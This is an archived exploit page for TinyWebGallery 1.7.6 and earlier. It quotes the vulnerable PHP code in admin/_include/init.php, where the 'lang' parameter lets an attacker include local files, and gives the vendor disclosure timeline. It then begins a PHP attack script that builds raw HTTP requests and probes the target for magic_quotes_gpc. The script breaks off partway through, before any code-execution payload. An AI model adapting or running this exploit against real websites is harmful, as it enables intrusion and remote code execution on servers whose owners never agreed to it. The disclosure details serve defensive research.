AOH :: HP Unsorted T :: VA3424.HTM

TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit



TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit



http://www.travesti.in 
details..: this vulnerability drift from QuiXplorer (http://quixplorer.sourceforge.net/) 
exp link.: http://www.travesti.in/ex.txt 

	This PoC was written for educational purpose. Use it at your own risk.
	Author will be not responsible for any damage.

	[-] vulnerable code in /admin/_include/init.php

	110.	// Get Language
	111.	if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__GET']["lang"];
	112.	elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__POST']["lang"];
	113.	else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];  
	114.	else $GLOBALS["language"] = $GLOBALS["default_language"];
	115.=09
			[...]
	138.=09
	139.	// ------------------------------------------------------------------------------
	140.	// Necessary files
	141.	require _QUIXPLORER_PATH . "/_config/conf.php";
	142.=09
	143.	if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
	144.	    require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
	145.	else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
	146.	    require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
	147.	else
	148.	    require _QUIXPLORER_PATH . "/_lang/en.php";

	An attacker could be able to include arbitrary local files through the require function at line 144, due to
	$_GET['lang'] parameter isn't properly sanitised. Successful exploitation requires magic_quotes_gpc = off

	[-] Disclosure timeline:
	=09
	[14/04/2009] - Bug discovered
	[25/04/2009] - Vendor contacted
	[26/04/2009] - Vendor replied
[26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653 
	[08/05/2009] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
	if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
	  die("\nsocket_create(): " . socket_strerror($s) . "\n");

	if (socket_connect($s, $host, 80) == false)
	  die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

	socket_write($s, $packet, strlen($packet));
	while ($m = socket_read($s, 2048)) $response .= $m;

	socket_close($s);
	return $response;
}

function check_target()
{
	global $host, $path;

	$packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "Connection: close\r\n\r\n";

	preg_match('/magic_quotes_gpc<\/td>(.*)<\/td>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.